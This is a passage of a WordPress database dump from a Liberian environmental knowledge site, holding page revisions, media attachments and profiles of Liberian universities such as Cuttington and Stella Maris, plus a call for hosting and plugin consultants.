<li>\n										Website Link\n									</li>\n						</ul>','Elementor Single Post #4918','','inherit','closed','closed','','4918-revision-v1','','','2022-08-19 15:34:53','2022-08-19 15:34:53','',4918,'https://ekmsliberia.info/?p=4921',0,'revision','',0),(4922,42,'2022-08-19 15:35:55','2022-08-19 15:35:55','<ul>\n							<li>\n										Website Link\n									</li>\n						</ul>','Elementor Single Post #4918','','inherit','closed','closed','','4918-revision-v1','','','2022-08-19 15:35:55','2022-08-19 15:35:55','',4918,'https://ekmsliberia.info/?p=4922',0,'revision','',0),(4924,42,'2022-08-19 15:47:33','2022-08-19 15:47:33','<ul>\n							<li>\n										Website Link\n									</li>\n						</ul>','Elementor Single Post #4918','','inherit','closed','closed','','4918-revision-v1','','','2022-08-19 15:47:33','2022-08-19 15:47:33','',4918,'https://ekmsliberia.info/?p=4924',0,'revision','',0),(4925,42,'2022-08-19 15:48:46','2022-08-19 15:48:46','<ul>\n							<li>\n										Website Link\n									</li>\n						</ul>','Elementor Single Post #4918','','inherit','closed','closed','','4918-revision-v1','','','2022-08-19 15:48:46','2022-08-19 15:48:46','',4918,'https://ekmsliberia.info/?p=4925',0,'revision','',0),(4926,42,'2022-08-19 15:54:54','2022-08-19 15:54:54','','Elementor Loop #4926','','publish','closed','closed','','elementor-loop-4926','','','2022-08-19 15:57:27','2022-08-19 15:57:27','',0,'https://ekmsliberia.info/?post_type=elementor_library&#038;p=4926',0,'elementor_library','',0),(4927,42,'2022-08-19 15:51:42','2022-08-19 15:51:42','','Elementor Loop #4926','','inherit','closed','closed','','4926-revision-v1','','','2022-08-19 15:51:42','2022-08-19 15:51:42','',4926,'https://ekmsliberia.info/?p=4927',0,'revision','',0),(4928,42,'2022-08-19 15:57:27','2022-08-19 15:57:27','','Elementor Loop #4926','','inherit','closed','closed','','4926-revision-v1','','','2022-08-19 15:57:27','2022-08-19 15:57:27','',4926,'https://ekmsliberia.info/?p=4928',0,'revision','',0),(4929,42,'2022-08-19 15:57:27','2022-08-19 15:57:27','','Elementor Loop #4926','','inherit','closed','closed','','4926-revision-v1','','','2022-08-19 15:57:27','2022-08-19 15:57:27','',4926,'https://ekmsliberia.info/?p=4929',0,'revision','',0),(4930,42,'2022-08-19 15:58:32','2022-08-19 15:58:32','<h4><a href=\"https://ekmsliberia.info/university/a-m-e-zion-university/\">A.M.E Zion University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/african-methodist-episcopal-university/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/ameu-370x265.jpg\" alt=\"African Methodist Episcopal University\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/african-methodist-episcopal-university/\">African Methodist Episcopal University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/cuttington-university/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/cu-370x265.jpg\" alt=\"Cuttington University\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/cuttington-university/\">Cuttington University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/university-of-liberia/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/UL-1-370x265.jpg\" alt=\"University of Liberia\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/university-of-liberia/\">University of Liberia</a></h4>','All Universities','','publish','closed','closed','','all-universities','','','2022-08-23 11:48:14','2022-08-23 11:48:14','',0,'https://ekmsliberia.info/?page_id=4930',0,'page','',0),(4931,42,'2022-08-19 15:58:32','2022-08-19 15:58:32','','All Universities','','inherit','closed','closed','','4930-revision-v1','','','2022-08-19 15:58:32','2022-08-19 15:58:32','',4930,'https://ekmsliberia.info/?p=4931',0,'revision','',0),(4933,42,'2022-08-19 16:05:08','2022-08-19 16:05:08','','All Universities','','inherit','closed','closed','','4930-revision-v1','','','2022-08-19 16:05:08','2022-08-19 16:05:08','',4930,'https://ekmsliberia.info/?p=4933',0,'revision','',0),(4934,42,'2022-08-19 16:05:08','2022-08-19 16:05:08','','All Universities','','inherit','closed','closed','','4930-revision-v1','','','2022-08-19 16:05:08','2022-08-19 16:05:08','',4930,'https://ekmsliberia.info/?p=4934',0,'revision','',0),(4935,42,'2022-08-19 16:05:08','2022-08-19 16:05:08','<a href=\"https://ekmsliberia.info/university/university-of-liberia/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/UL-370x265.jpg\" alt=\"University of Liberia\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/university-of-liberia/\">University of Liberia</a></h4>','All Universities','','inherit','closed','closed','','4930-revision-v1','','','2022-08-19 16:05:08','2022-08-19 16:05:08','',4930,'https://ekmsliberia.info/?p=4935',0,'revision','',0),(4936,42,'2022-08-22 10:08:37','2022-08-22 10:08:37',' ','','','publish','closed','closed','','4936','','','2022-08-22 10:08:37','2022-08-22 10:08:37','',0,'https://ekmsliberia.info/?p=4936',6,'nav_menu_item','',0),(4937,42,'2022-08-22 10:09:39','2022-08-22 10:09:39','','UL','','inherit','open','closed','','ul-2','','','2022-08-22 10:09:39','2022-08-22 10:09:39','',4911,'https://ekmsliberia.info/wp-content/uploads/2022/08/UL-1.jpg',0,'attachment','image/jpeg',0),(4938,42,'2022-08-22 10:15:59','2022-08-22 10:15:59','<!-- wp:paragraph -->\n<p>In 1949, ‘Cuttington College and Divinity School’ was reopened through the obstinate intervention of Bishop Bravid W. Harris, Bishop of Liberia (1945-1964), and by the benevolence of Dr. William V.S. Tubman, President of Liberia (1944-1971). The Liberian Government with a good measure of foresight donated to the Missionary District 1,500 acres of rich agricultural land at Suakoko, Bong County, for the purpose of establishing a College in the hinterland. Cuttington became the first and only four year, degree granting, co-educational, Private liberal arts college south of the Sahara. The Rev. Seth Edwards was named the First President of Cuttington College and Divinity School in Suakoko. He served for eleven years (1949-1960). He was succeeded by Dr. Christian E. Baker who served for twelve years (1960-1972). Father Edwards and able staff were responsible for laying the foundation for the moral and academic excellence of the college. In the early 1970’s it was renamed Cuttington University College.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Baker continued to uphold this philosophy by establishing a linkage between Cuttington and the Association of Episcopal Colleges and Association of Colleges of the Midwest, both of the USA. The Reverend Dr. E. Bolling Robertson served as Interim President for the period 1972-1973.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Reverend Fr. Emmanuel Johnson was named in 1973 as the third president of the College and served until 1980. It had six (6) degree granting Colleges: Education, Humanities, Social Science, Natural Science, and Nursing &amp; Theology with plans to add more academic programs. Rev. Johnson was followed in 1981 by Dr. Stephen M. Yekeson, the first alumnus to head the college. He became the fourth president, after serving as Professor of Science and Dean of Academic Affairs. He served until December 1986.</p>\n<!-- /wp:paragraph -->','Cuttington University','','publish','closed','closed','','cuttington-university','','','2022-08-22 10:16:01','2022-08-22 10:16:01','',0,'https://ekmsliberia.info/?post_type=university&#038;p=4938',0,'university','',0),(4939,42,'2022-08-22 10:14:56','2022-08-22 10:14:56','','Cuttington-University','','inherit','open','closed','','cuttington-university-2','','','2022-08-22 10:16:01','2022-08-22 10:16:01','',4938,'https://ekmsliberia.info/wp-content/uploads/2022/08/Cuttington-University-1.jpeg',0,'attachment','image/jpeg',0),(4940,42,'2022-08-22 10:15:18','2022-08-22 10:15:18','','cu','','inherit','open','closed','','cu','','','2022-08-22 10:15:18','2022-08-22 10:15:18','',4938,'https://ekmsliberia.info/wp-content/uploads/2022/08/cu.jpg',0,'attachment','image/jpeg',0),(4941,42,'2022-08-22 10:22:04','2022-08-22 10:22:04','','African Methodist Episcopal University','','publish','closed','closed','','african-methodist-episcopal-university','','','2022-08-22 10:22:06','2022-08-22 10:22:06','',0,'https://ekmsliberia.info/?post_type=university&#038;p=4941',0,'university','',0),(4942,42,'2022-08-22 10:18:28','2022-08-22 10:18:28','','ameu logo','','inherit','open','closed','','ameu-logo','','','2022-08-22 10:22:06','2022-08-22 10:22:06','',4941,'https://ekmsliberia.info/wp-content/uploads/2022/08/ameu-logo-1.jpg',0,'attachment','image/jpeg',0),(4943,42,'2022-08-22 10:21:20','2022-08-22 10:21:20','','ameu','','inherit','open','closed','','ameu','','','2022-08-22 10:21:20','2022-08-22 10:21:20','',4941,'https://ekmsliberia.info/wp-content/uploads/2022/08/ameu.jpg',0,'attachment','image/jpeg',0),(4944,42,'2022-08-22 10:28:57','2022-08-22 10:28:57','<!-- wp:paragraph -->\n<p>The United Methodist University (UMU) is a private four-year liberal arts institution of higher learning owned by the Liberia Annual Conference of the United Methodist Church, and is located in Monrovia, Liberia. The University has about 5000 students enrolled on four campuses (Monrovia, Gbarnga, Ganta, and Gbazon Town, Sinoe) across Liberia. Affiliated with the General Board of Higher Education and Ministry of the United Methodist Church, the University is the only United Methodist Church institution of higher learning in the West Africa Central Conference.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The United Methodist University is accredited by the National Commission on Higher Education in the Republic of Liberia, and currently offers five undergraduate degrees, the Bachelor of Arts, Bachelor of Science, Bachelor of Business Administration, Bachelor of Social Work, Bachelor of Theology, and one graduate degree, the Master of Divinity. The University also offers diplomas and associate degrees.</p>\n<!-- /wp:paragraph -->','United Methodist University','','publish','closed','closed','','united-methodist-university','','','2022-08-23 11:49:41','2022-08-23 11:49:41','',0,'https://ekmsliberia.info/?post_type=university&#038;p=4944',0,'university','',0),(4945,42,'2022-08-22 10:23:03','2022-08-22 10:23:03','','umu_logo','','inherit','open','closed','','umu_logo','','','2022-08-23 11:49:41','2022-08-23 11:49:41','',4944,'https://ekmsliberia.info/wp-content/uploads/2022/08/umu_logo-1.png',0,'attachment','image/png',0),(4946,42,'2022-08-22 10:28:06','2022-08-22 10:28:06','','umu','','inherit','open','closed','','umu','','','2022-08-22 10:28:06','2022-08-22 10:28:06','',4944,'https://ekmsliberia.info/wp-content/uploads/2022/08/umu.jpg',0,'attachment','image/jpeg',0),(4950,42,'2022-08-23 11:46:19','2022-08-23 11:46:19','<!-- wp:paragraph -->\n<p>The AME Zion University commenced in 1983 with the founding of the AME Zion School of Business Studies attached to the AME Zion Academy, a high school owned by the AME Zion Church.&nbsp; In 1987, the AME Zion Community College was established, offering Associate degrees in Criminal Justice Administration and Law Enforcement, Liberal Arts, Business Administration, Diploma in Trauma Counseling, and Computer Science, and held its first Annual Convocation on May 22, 1989.&nbsp; The AME Zion Community College at the time had the best Computer Science Laboratory in the Country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In 1996 by an Act of the National Legislature, the AME Zion University was established with the Reverend Frederick Umoja, serving as its first President.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In January 1999, the Rev. Dr. Frank K.M. Zormelo was inducted as the second President of the University.&nbsp; In August 2001, a year and a half later, the Rev. Dr. Mulbah B. Gray, Sr. was appointed the third President.&nbsp; He is the first native Liberian to become President of the AME Zion University; prior to his appointment, he served as the University’s Vice President for Administration.</p>\n<!-- /wp:paragraph -->','A.M.E Zion University','','publish','closed','closed','','a-m-e-zion-university','','','2022-08-23 12:00:50','2022-08-23 12:00:50','',0,'https://ekmsliberia.info/?post_type=university&#038;p=4950',0,'university','',0),(4951,42,'2022-08-22 10:34:15','2022-08-22 10:34:15','','zionseal','','inherit','open','closed','','zionseal','','','2022-08-23 12:00:50','2022-08-23 12:00:50','',4950,'https://ekmsliberia.info/wp-content/uploads/2022/08/zionseal-1.png',0,'attachment','image/png',0),(4952,42,'2022-08-23 11:35:34','2022-08-23 11:35:34','<a href=\"https://ekmsliberia.info/university/university-of-liberia/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/UL-370x265.jpg\" alt=\"University of Liberia\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/university-of-liberia/\">University of Liberia</a></h4>','All Universities','','inherit','closed','closed','','4930-revision-v1','','','2022-08-23 11:35:34','2022-08-23 11:35:34','',4930,'https://ekmsliberia.info/?p=4952',0,'revision','',0),(4953,42,'2022-08-23 11:35:34','2022-08-23 11:35:34','<a href=\"https://ekmsliberia.info/university/university-of-liberia/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/UL-370x265.jpg\" alt=\"University of Liberia\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/university-of-liberia/\">University of Liberia</a></h4>','All Universities','','inherit','closed','closed','','4930-revision-v1','','','2022-08-23 11:35:34','2022-08-23 11:35:34','',4930,'https://ekmsliberia.info/?p=4953',0,'revision','',0),(4954,42,'2022-08-23 11:35:35','2022-08-23 11:35:35','<a href=\"https://ekmsliberia.info/university/african-methodist-episcopal-university/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/ameu-370x265.jpg\" alt=\"African Methodist Episcopal University\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/african-methodist-episcopal-university/\">African Methodist Episcopal University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/cuttington-university/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/cu-370x265.jpg\" alt=\"Cuttington University\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/cuttington-university/\">Cuttington University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/university-of-liberia/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/UL-1-370x265.jpg\" alt=\"University of Liberia\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/university-of-liberia/\">University of Liberia</a></h4>','All Universities','','inherit','closed','closed','','4930-revision-v1','','','2022-08-23 11:35:35','2022-08-23 11:35:35','',4930,'https://ekmsliberia.info/?p=4954',0,'revision','',0),(4955,42,'2022-08-23 11:48:13','2022-08-23 11:48:13','<a href=\"https://ekmsliberia.info/university/african-methodist-episcopal-university/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/ameu-370x265.jpg\" alt=\"African Methodist Episcopal University\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/african-methodist-episcopal-university/\">African Methodist Episcopal University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/cuttington-university/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/cu-370x265.jpg\" alt=\"Cuttington University\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/cuttington-university/\">Cuttington University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/university-of-liberia/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/UL-1-370x265.jpg\" alt=\"University of Liberia\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/university-of-liberia/\">University of Liberia</a></h4>','All Universities','','inherit','closed','closed','','4930-revision-v1','','','2022-08-23 11:48:13','2022-08-23 11:48:13','',4930,'https://ekmsliberia.info/?p=4955',0,'revision','',0),(4956,42,'2022-08-23 11:48:13','2022-08-23 11:48:13','<a href=\"https://ekmsliberia.info/university/african-methodist-episcopal-university/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/ameu-370x265.jpg\" alt=\"African Methodist Episcopal University\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/african-methodist-episcopal-university/\">African Methodist Episcopal University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/cuttington-university/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/cu-370x265.jpg\" alt=\"Cuttington University\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/cuttington-university/\">Cuttington University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/university-of-liberia/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/UL-1-370x265.jpg\" alt=\"University of Liberia\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/university-of-liberia/\">University of Liberia</a></h4>','All Universities','','inherit','closed','closed','','4930-revision-v1','','','2022-08-23 11:48:13','2022-08-23 11:48:13','',4930,'https://ekmsliberia.info/?p=4956',0,'revision','',0),(4957,42,'2022-08-23 11:48:14','2022-08-23 11:48:14','<h4><a href=\"https://ekmsliberia.info/university/a-m-e-zion-university/\">A.M.E Zion University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/african-methodist-episcopal-university/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/ameu-370x265.jpg\" alt=\"African Methodist Episcopal University\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/african-methodist-episcopal-university/\">African Methodist Episcopal University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/cuttington-university/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/cu-370x265.jpg\" alt=\"Cuttington University\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/cuttington-university/\">Cuttington University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/university-of-liberia/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/UL-1-370x265.jpg\" alt=\"University of Liberia\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/university-of-liberia/\">University of Liberia</a></h4>','All Universities','','inherit','closed','closed','','4930-revision-v1','','','2022-08-23 11:48:14','2022-08-23 11:48:14','',4930,'https://ekmsliberia.info/?p=4957',0,'revision','',0),(4958,42,'2022-08-23 11:52:45','2022-08-23 11:52:45','<h4><a href=\"https://ekmsliberia.info/university/a-m-e-zion-university/\">A.M.E Zion University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/united-methodist-university/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/umu-370x265.jpg\" alt=\"United Methodist University\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/united-methodist-university/\">United Methodist University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/african-methodist-episcopal-university/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/ameu-370x265.jpg\" alt=\"African Methodist Episcopal University\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/african-methodist-episcopal-university/\">African Methodist Episcopal University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/cuttington-university/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/cu-370x265.jpg\" alt=\"Cuttington University\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/cuttington-university/\">Cuttington University</a></h4>\n	<a href=\"https://ekmsliberia.info/university/university-of-liberia/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/08/UL-1-370x265.jpg\" alt=\"University of Liberia\" loading=\"lazy\" width=\"370\" height=\"265\"></a><h4><a href=\"https://ekmsliberia.info/university/university-of-liberia/\">University of Liberia</a></h4>','All Universities','','inherit','closed','closed','','4930-autosave-v1','','','2022-08-23 11:52:46','2022-08-23 11:52:46','',4930,'https://ekmsliberia.info/?p=4958',0,'revision','',0),(4959,42,'2022-08-23 12:00:30','2022-08-23 12:00:30','','amez','','inherit','open','closed','','amez','','','2022-08-23 12:00:30','2022-08-23 12:00:30','',4950,'https://ekmsliberia.info/wp-content/uploads/2022/08/amez.jpg',0,'attachment','image/jpeg',0),(4960,42,'2022-08-23 13:48:18','2022-08-23 13:48:18','<!-- wp:paragraph -->\n<p>The Stella Maris Polytechnic is an Institution of higher learning own and operated by the Catholic Archdioces of Monrovia. With main campus situated on Capitol Hill in Monrovia the Polytechnic boasts of four colleges with over 2,500 enrollment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The almost 570 graduates of the 13th commencement convocation exercises in 2012 was the largest number of graduates ever produced by the polytechnic since its establishment. Moreover, it was delightful to see that there were a number of honored students as compared to previous classes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Stella Maris Polytechnic formerly Don Bosco Polytechnic received its Charter from the National Legislature on August 15, 1988. With the change of name to Stella Maris Polytechnic a Bill to amend the charter was presented to the National Transitional Legislative Assembly and was approved on November 18, 2005.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Stella Maris Polytechnic is recognized by the Ministry of Education, Republic of Liberia, the Commission on Higher Education in the Republic of Liberia as a founding member of the Association of Liberian Universities (ALU) it accepts the credits, (within guidelines: please see Transfer students) from Cuttington University, United Methodist University, African Methodist Episcopal University, African Methodist Episcopal Zion University, and the University of Liberia. Due to the over-crowdedness of the undergraduate school, the University of Liberia presently accepts only students from Stella Maris Polytechnic for the graduate school.</p>\n<!-- /wp:paragraph -->','Stella Maris Polytechnic University','','publish','closed','closed','','stella-maris-polytechnic-university','','','2022-09-17 09:34:46','2022-09-17 09:34:46','',0,'https://ekmsliberia.info/?post_type=university&#038;p=4960',0,'university','',0),(4961,42,'2022-08-23 13:34:09','2022-08-23 13:34:09','','stella maris logo','','inherit','open','closed','','stella-maris-logo','','','2022-09-17 09:34:46','2022-09-17 09:34:46','',4960,'https://ekmsliberia.info/wp-content/uploads/2022/08/stella-maris-logo-1.jpg',0,'attachment','image/jpeg',0),(4962,42,'2022-08-23 13:48:01','2022-08-23 13:48:01','','smpu','','inherit','open','closed','','smpu','','','2022-08-23 13:48:01','2022-08-23 13:48:01','',4960,'https://ekmsliberia.info/wp-content/uploads/2022/08/smpu.jpg',0,'attachment','image/jpeg',0),(4963,42,'2022-08-23 13:52:43','2022-08-23 13:52:43','<!-- wp:paragraph -->\n<p>The emergence of the Adventist University of West Africa began with the Seventh-day Adventist Church quest for a tertiary institution in Liberia. Such would serve as one of the pillars of the call of the Church in the area of education. This vision was actualized on August 7, 2003 when the Liberian Government chattered the University. Subsequently, the University was incorporated by an act of the Honorable Senate and House of Representatives of the Republic of Liberia published on September 8, 2003 by the authority of Ministry of Foreign Affairs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The University started physical existence at its temporary site on the facility of the Adventist High School, located on 120 Camp Johnson Road, Monrovia in August 2010. On February 21, 2011, AUWA commenced operations with a limited number of two-year associate degree programs, and thereafter enrolled 105 students in 2011, for which classes began on Tuesday, March 1, 2011.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The groundbreaking of the permanent site of the University at Advent Hill, Roberts Field Highway, Schiefflin Town, Margibi County (equidistant between the International Airport and Monrovia city) was held on March 27, 2012.&nbsp; The University received its full degree Charter from the Liberian Government on March 18, 2013 for Bachelor’s degree programs in Theology, Education, Health Science and Business. The Liberian Board for Nursing and Midwifery granted AUWA license for the Nursing program from 2013. AUWA received candidacy status from the Adventist Accrediting Association on October 9, 2013 and regular status on October 4, 2017. The University is also a functional member of the Association of Liberian Universities (ALU). The University relocated to its permanent site at Advent Hill, Robert\'s field Highway, Schiefflin Township on March 23, 2015 with the first Administrative Committee meeting and first classroom activities.</p>\n<!-- /wp:paragraph -->','Adventist University of West Africa','','publish','closed','closed','','adventist-university-of-west-africa','','','2022-08-23 13:52:44','2022-08-23 13:52:44','',0,'https://ekmsliberia.info/?post_type=university&#038;p=4963',0,'university','',0),(4964,42,'2022-08-23 13:50:39','2022-08-23 13:50:39','','auwa logo','','inherit','open','closed','','auwa-logo','','','2022-08-23 13:52:44','2022-08-23 13:52:44','',4963,'https://ekmsliberia.info/wp-content/uploads/2022/08/auwa-logo-1.jpg',0,'attachment','image/jpeg',0),(4965,42,'2022-08-23 13:52:29','2022-08-23 13:52:29','','auwa','','inherit','open','closed','','auwa','','','2022-08-23 13:52:29','2022-08-23 13:52:29','',4963,'https://ekmsliberia.info/wp-content/uploads/2022/08/auwa.jpg',0,'attachment','image/jpeg',0),(4966,42,'2022-08-23 13:59:41','2022-08-23 13:59:41','<!-- wp:paragraph -->\n<p>STARZ was established in the U.S.A. in 2007 and incorporated in Monrovia, Liberia in July of 2009; with the objectives of addressing the IT and capacity needs of Liberia. Starz University is Accredited and Chartered in Liberia by the Commission on Higher Education.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As a certified partner to Microsoft Academy, Cisco, and IBM, the institution provides various IT services and solutions for schools, businesses, and a diverse range of customers throughout Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Starz is an accredited tertiary level institution in the Republic of Liberia by the Commission on Higher Education and offers Bachelor’s Degree and Master’s Degree programs in various areas. </p>\n<!-- /wp:paragraph -->','Starz University','','publish','closed','closed','','starz-university','','','2022-08-23 13:59:42','2022-08-23 13:59:42','',0,'https://ekmsliberia.info/?post_type=university&#038;p=4966',0,'university','',0),(4967,42,'2022-08-23 13:57:56','2022-08-23 13:57:56','','Starz-University-Logo','','inherit','open','closed','','starz-university-logo','','','2022-08-23 13:59:42','2022-08-23 13:59:42','',4966,'https://ekmsliberia.info/wp-content/uploads/2022/08/Starz-University-Logo-1.png',0,'attachment','image/png',0),(4968,42,'2022-08-23 13:59:31','2022-08-23 13:59:31','','starz','','inherit','open','closed','','starz','','','2022-08-23 13:59:31','2022-08-23 13:59:31','',4966,'https://ekmsliberia.info/wp-content/uploads/2022/08/starz.jpg',0,'attachment','image/jpeg',0),(4969,42,'2022-08-25 11:29:14','2022-08-25 11:29:14','','TERMS OF REFERENCE FOR VIDEO DOCUMENTARY 2022','','inherit','open','closed','','terms-of-reference-for-video-documentary-2022-2','','','2022-08-25 11:29:14','2022-08-25 11:29:14','',0,'https://ekmsliberia.info/wp-content/uploads/2022/08/TERMS-OF-REFERENCE-FOR-VIDEO-DOCUMENTARY-2022.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(4970,42,'2022-08-25 11:29:28','2022-08-25 11:29:28','','Terms of Reference to procure and install plugins and hosting subscription','','inherit','open','closed','','terms-of-reference-to-procure-and-install-plugins-and-hosting-subscription','','','2022-08-25 11:29:28','2022-08-25 11:29:28','',0,'https://ekmsliberia.info/wp-content/uploads/2022/08/Terms-of-Reference-to-procure-and-install-plugins-and-hosting-subscription.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(4971,42,'2022-08-10 11:29:41','2022-08-10 11:29:41','Liberia has undertaken numerous initiatives to address environmental issues.  Despite those initiatives, Liberia continues to face important challenges to meeting environmental goals. Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions.  Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it.\r\n\r\nLeading to the formulation of the Rio Convention mainstreaming project, a National Capacity Self-Assessment (NCSA) was undertaken through a consultative process and participatory approach that involved numerous stakeholders from various sectors in 2006 to establish empirical cause(s) leading to Liberia struggle to fulfill many of the objectives set forth in the Rio Conventions especially information sharing and coordination. The NCSA identified the following barriers that cut across the three Rio Conventions as reasons for the struggle: Inadequate public awareness and education/training, inadequate access to information, Lack of institutional capacities, and Lack of effective mechanism for information processing and sharing.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/Terms-of-Reference-to-procure-and-install-plugins-and-hosting-subscription.docx\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a></strong></em>','Call for Expression of Interest to Procure and Install Hosting & Plugins for the Environmental Knowledge Management System','','publish','closed','closed','','call-for-expression-of-interest-to-procure-and-install-hosting-plugins-for-the-environmental-knowledge-management-system','','','2022-08-25 11:39:37','2022-08-25 11:39:37','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4971',69,'ekms_bulletin','',0),(4972,42,'2022-08-25 11:32:11','2022-08-25 11:32:11','Liberia has undertaken numerous initiatives to address environmental issues.  Despite those initiatives, Liberia continues to face important challenges to meeting environmental goals. Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions.  Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it.\r\n\r\nLeading to the formulation of the Rio Convention mainstreaming project, a National Capacity Self-Assessment (NCSA) was undertaken through a consultative process and participatory approach that involved numerous stakeholders from various sectors in 2006 to establish empirical cause(s) leading to Liberia struggle to fulfill many of the objectives set forth in the Rio Conventions especially information sharing and coordination. The NCSA identified the following barriers that cut across the three Rio Conventions as reasons for the struggle: Inadequate public awareness and education/training, inadequate access to information, Lack of institutional capacities, and Lack of effective mechanism for information processing and sharing.','Call for Expression of Interest to Procure and Install Hosting & Plugins for the Environmental Knowledge Management System','','inherit','closed','closed','','4971-revision-v1','','','2022-08-25 11:32:11','2022-08-25 11:32:11','',4971,'https://ekmsliberia.info/?p=4972',0,'revision','',0),(4975,42,'2022-08-25 11:39:37','2022-08-25 11:39:37','Liberia has undertaken numerous initiatives to address environmental issues.  Despite those initiatives, Liberia continues to face important challenges to meeting environmental goals. Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions.  Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or 